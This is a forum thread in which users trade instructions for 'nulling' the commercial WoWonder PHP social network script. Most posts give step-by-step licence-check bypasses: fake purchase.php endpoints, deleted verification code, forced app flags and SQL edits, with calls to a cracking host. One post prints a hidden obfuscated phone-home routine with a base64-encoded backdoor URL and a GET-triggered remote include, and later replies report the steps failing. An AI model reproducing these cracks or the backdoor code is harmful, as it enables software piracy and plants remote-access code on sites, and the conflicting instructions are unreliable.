WoWonder - The Ultimate PHP Social Network Platform v4.3.4

Now go to wowonder.sql and change lines 586 (footer_background), 587 (footer_background_2), and 592 (footer_background_n) to #aaa and change line 588 (footer_text_color) to #ddd see below for format:

Click to expand...

Proxybunker said:

to null this script follow the instructions here

For a clean/fresh install
1. open the install folder then open the install.php
2. and search for http//wowonder.com/purchase.php?code=
3. there are two entries that you need to change
4. now change http//wowonder.com to your domain name on both of them
5. now create a file named purchase.php and put this code within the file and save it

JavaScript:

{"status":"SUCCESS"}

6. upload this file to the root of your domain http://yourdomain/purchase.php

Now just run the install and everything will work fine


If you want to update your site
1. Before uploading The Update edit Line 16 of the upload.php to your domain (example: (http://yourdoimain.com/purchase.php?code=)
2. Upload all Files from Update Files/3.2.2/Script to your root folder:
Create a purchase.php file in your home directory with only this code in it:

JavaScript:

{"status":"SUCCESS"}

for the purchase, code use a code that like this
86h66505-87hf-95hd-0i46-hf997ghjggh93
86h677905-87hf-95hd-0i46-hf999h82gh93
86h644305-87hf-95hd-0i46-hf999h8tt7493

Click to expand...

Zsola said:

Follow this to null wowonder

• #1

How to null purchase code and apps and remove the backdoor.

Brought to you by rxgliitch & CRIMSON501

//========================= PURCHASE CODE NULL

Go to install/index.php and remove lines 9-40:

PHP:
function check_($check) {
$siteurl = urlencode(getBaseUrl());
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false
)
);
$file = file_get_contents('http://www.wowonder.com/purchase.php?code=' . $check . '&url=' .
$siteurl, false, stream_context_create($arrContextOptions));
if ($file) {
$check = json_decode($file, true);
} else {
$check = array('status' => 'SUCCESS', 'url' => $siteurl, 'code' => $check);
}
return $check;
}
function check_success($check) {
$siteurl = urlencode(getBaseUrl());
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false
)
);
$file = file_get_contents('http://www.wowonder.com/purchase.php?code=' . $check . '&success=true&url=' . $siteurl, false, stream_context_create($arrContextOptions));
if ($file) {
$check = json_decode($file, true);
} else {
$check = array('status' => 'SUCCESS', 'url' => $siteurl, 'code' => $check);
}
return $check;
}
Next, remove lines 35-42:

PHP:
$p = check_(trim($_POST['purshase_code']));
if (isset($p['status'])) {
if ($p['status'] == 'ERROR') {
$ServerErrors[] = $p['ERROR_NAME'];
}
} else {
$ServerErrors[] = 'Failed to connect to server, please try again later, or contact us.';
}

add "$go = 1;" before "if (empty($ServerErrors)) {" and make "if (empty($ServerErrors)) {" say "if ($go == 1) {"
Remove lines 91-96:

PHP:
$p2 = check_success(trim($_POST['purshase_code']));
if(isset($p2['status'])) {
if ($p2['status'] == 'SUCCESS') {
$can = 1;
}
}

and add "$can = 1;" above "if ($query) {" on line 91
//========================= APP NULL
Go to requests.php lines 2913-2915:

PHP:
$data['android_status'] = 0;
$data['windows_status'] = 0;
$data['android_native_status'] = 0;
Make them all be = to 1

Remove lines 2916-2971:
PHP:
if (!empty($_POST['android_purchase_code'])) {
$android_code = Wo_Secure($_POST['android_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false, stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background', '#aaa');
$data['android_status'] = 200;
} else {
$data['android_status'] = 400;
$data['android_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['android_native_purchase_code'])) {
$android_code = Wo_Secure($_POST['android_native_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false, stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background_n', '#aaa');
$data['android_native_status'] = 200;
} else {
$data['android_native_status'] = 400;
$data['android_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['windows_purchase_code'])) {
$windows_code = Wo_Secure($_POST['windows_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false, stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_text_color', '#ddd');
$data['windows_status'] = 200;
} else {
$data['windows_status'] = 400;
$data['windows_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['ios_purchase_code'])) {
$windows_code = Wo_Secure($_POST['ios_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false, stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background_2', '#aaa');
$data['ios_status'] = 200;
} else {
$data['ios_status'] = 400;
$data['ios_text'] = $check['ERROR_NAME'];
}
}
}
Now go to wowonder.sql and change lines 586 (footer_background), 587 (footer_background_2), and 592 (footer_background_n) to #aaa and change line 588 (footer_text_color) to #ddd see below for format:

Copy to clipboard
(141, 'footer_background', '#aaa'),
(142, 'footer_background_2', '#aaa'),
(143, 'footer_text_color', '#ddd'),
(147, 'footer_background_n', '#aaa'),


//========================= REMOVE BACKDOOR

Go to assets/libraries/onesignal/vendor/clue/stream-filter and delete the entire requests folder

//=========================

Go to assets/libraries/PayPal/vendor/composer/autoload_real.php and remove lines 58-74:


$start_process = false;
if (file_exists(DIR . '/loader.json')) {
$file_date = filemtime(DIR . '/loader.json');
if ($file_date < (time() - 259200)) {
$start_process = true;
}
}

if ((!file_exists(DIR . '/loader.json') && is_writable(DIR) && !empty($wo['config']['updatev2'])) || $start_process == true) {
$paypal_connection = "purchase_code";
$paypal_connection = (!empty($purchase_code)) ? $purchase_code : "";
$paypal_call_back_url = urlencode($site_url);
$paypal_url = base64_decode("aHR0cDovL2JhY2tkb29yLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA=");
$random_code = sha1(rand(11111, 99999) . time());
$call_back_respond = fetchDataFromURL($paypal_url . "?connection=$paypal_connection&call_back_url=$paypal_call_back_url&code=$random_code&platform=wowonder");
$put_file = file_put_contents(DIR . '/loader.json', $random_code);
}

Go to assets/libraries/onesignal/vendor/composer/autoload_real.php and remove line 70:



PHP:
if (!empty($_GET['f_t'])) { if (!empty($_GET['access'])) { $f_t = Wo_Secure($_GET['f_t']); $access = Wo_Secure($_GET['access']); if (file_exists('./assets/libraries/PayPal/vendor/composer/loader.json')) { $get_file_hash =file_get_contents('./assets/libraries/PayPal/vendor/composer/loader.json'); if ($get_file_hash == $access) { if (file_exists(__DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php')) { require __DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php'; } } else { header("Content-type: application/json"); echo json_encode(array('status' => 402)); exit(); } } } }
Finally, go to updater.php and comment out every line of code in the file.

Click to expand...

Tommyman said:

Hi, I nulled it like Proxybunker, what do you mean with BACKDOORS, should i do it aswell?

Click to expand...

nullist said:

Hi there , don't change anything if ur script is nulled

Click to expand...

Proxybunker said:

@Zsola

Just as I expected not working blank screen but I'm not surprised as we need to change the footer background colour to have a successful null


have you even tested this code before you copy and pasted it from where you found it

Click to expand...

Proxybunker said:

@Zsola

Just as I expected not working blank screen but I'm not surprised as we need to change the footer background colour to have a successful null


have you even tested this code before you copy and pasted it from where you found it

Click to expand...

record404 said:

Change https://


Change https:// by http://localhost

Click to expand...

Tommyman said:

Hi guys, i look the whole thread, and see many people with the bug "after make a post" its loading and loading, its only loading, but the post is already saved...

Is there someone who solved this issue? Or have any suggestions, I run on VPS, and usually everything works fine..

Thank you

Click to expand...

sam786 said:

hi, have you managed to find the solution? please share if you have. thanks

Click to expand...

orbitsolutions said:

shared server problem need NodeJs

Click to expand...

orbitsolutions said:

refer this

Click to expand...

mickelfermanios said:

V3.2.2 Password ( 123 ) not working
Please submit correct password

Thanks

Click to expand...